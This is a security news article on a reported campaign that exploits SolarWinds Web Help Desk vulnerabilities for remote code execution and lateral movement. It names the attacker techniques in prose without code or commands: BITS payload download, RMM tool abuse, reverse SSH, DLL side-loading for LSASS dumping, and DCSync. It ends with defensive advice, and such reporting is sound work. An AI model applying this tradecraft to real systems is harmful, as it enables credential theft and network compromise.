SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers

Microsoft has revealed a concerning multi-stage intrusion campaign targeting internet-exposed SolarWinds Web Help Desk (WHD) instances, allowing threat actors to achieve initial access and move laterally across organizational networks to compromise high-value assets.

Vulnerability Details

The attacks, which occurred in December 2025, exploited vulnerabilities in SolarWinds WHD that could allow unauthenticated remote code execution. While Microsoft's Defender Security Research Team cannot definitively confirm which specific CVE was used, the campaign potentially leveraged:

• CVE-2025-40551 (CVSS 9.8) - Untrusted data deserialization vulnerability
• CVE-2025-40536 (CVSS 8.1) - Security control bypass vulnerability
• CVE-2025-26399 (CVSS 9.8) - Previously patched untrusted data deserialization flaw

Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch agencies were ordered to apply fixes by February 6, 2026.

Attack Chain Analysis

According to Microsoft researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini, successful exploitation of exposed WHD instances allowed attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.

Initial Compromise

"Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution," the researchers noted.

Lateral Movement and Persistence

The threat actors employed several sophisticated techniques to establish persistence and move laterally:

1. Legitimate Tool Abuse: Downloaded Zoho ManageEngine components, a legitimate remote monitoring and management (RMM) solution, to enable persistent remote control

2. Credential Harvesting: Enumerated sensitive domain users and groups, including Domain Admins

3. Multiple Persistence Mechanisms:

   • Established reverse SSH and RDP access
   • Attempted to create scheduled tasks to launch QEMU virtual machines under SYSTEM account at startup
   • Used DLL side-loading with "wab.exe" (Windows Address Book executable) to launch rogue "sspicli.dll" for LSASS memory dumping

4. Advanced Domain Compromise: In at least one case, conducted DCSync attacks to simulate Domain Controllers and request password hashes from Active Directory databases

Security Recommendations

Microsoft emphasizes that this activity demonstrates how a single exposed application can provide a path to full domain compromise when vulnerabilities remain unpatched or insufficiently monitored.

Immediate Actions

• Keep WHD instances updated with the latest security patches
• Identify and remove any unauthorized RMM tools
• Rotate service and administrative account credentials
• Isolate compromised machines to limit breach scope

Long-term Defense Strategy

"This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored," Microsoft stated.

"In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers."

The campaign highlights the critical importance of securing internet-facing applications, particularly those with privileged access to internal networks. Organizations running SolarWinds WHD should immediately assess their exposure and apply available patches while monitoring for signs of compromise using the techniques described in this analysis.